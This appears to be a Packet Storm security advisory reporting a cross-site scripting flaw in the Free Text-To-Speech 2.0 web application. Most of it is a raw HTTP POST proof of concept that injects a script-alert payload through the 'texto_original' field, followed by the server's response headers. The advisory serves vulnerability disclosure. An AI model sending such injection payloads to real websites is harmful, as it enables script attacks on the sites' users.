Free Text-To-Speech 2.0 Cross Site Scripting

2015-04-20T00:00:00
ID PACKETSTORM:131527
Type packetstorm
Reporter TUNISIAN CYBER
Modified 2015-04-20T00:00:00

Description

                                        
                                            `+---------------------------------------------------------------------------+  
#[+] Author: TUNISIAN CYBER  
#[+] Title: Free Text-To-Speech System Cross Site Scripting  
#[+] Date: 19-04-2015  
#[+] Type: WebAPP  
#[+] Tested on: KaliLinux  
#[+] Friendly Sites: sec4ever.com  
#[+] Twitter: @TCYB3R  
+---------------------------------------------------------------------------+  
POC:  
http://i.imgur.com/Pstv89u.png  
  
http://127.0.0.1/nanbiquara_v2.0/  
  
  
  
POST /nanbiquara_v2.0/ HTTP/1.1  
Host: 127.0.0.1  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://127.0.0.1/nanbiquara_v2.0/  
Cookie: ck_login_id_20=1; ck_login_language_20=en_us; ck_login_theme_20=Sugar5  
Connection: keep-alive  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 94  
texto_original=%3Cscript%3Ealert%28%22XSS+TUNISIAN+CYBER%22%29%3B%3C%2Fscript%3E&voz=br1%2Fbr1  
HTTP/1.1 200 OK  
Date: Sun, 19 Apr 2015 20:12:59 GMT  
Server: Apache/2.2.22 (Debian)  
X-Powered-By: PHP/5.4.39-0+deb7u2  
Vary: Accept-Encoding  
Content-Encoding: gzip  
Content-Length: 830  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Type: text/html  
`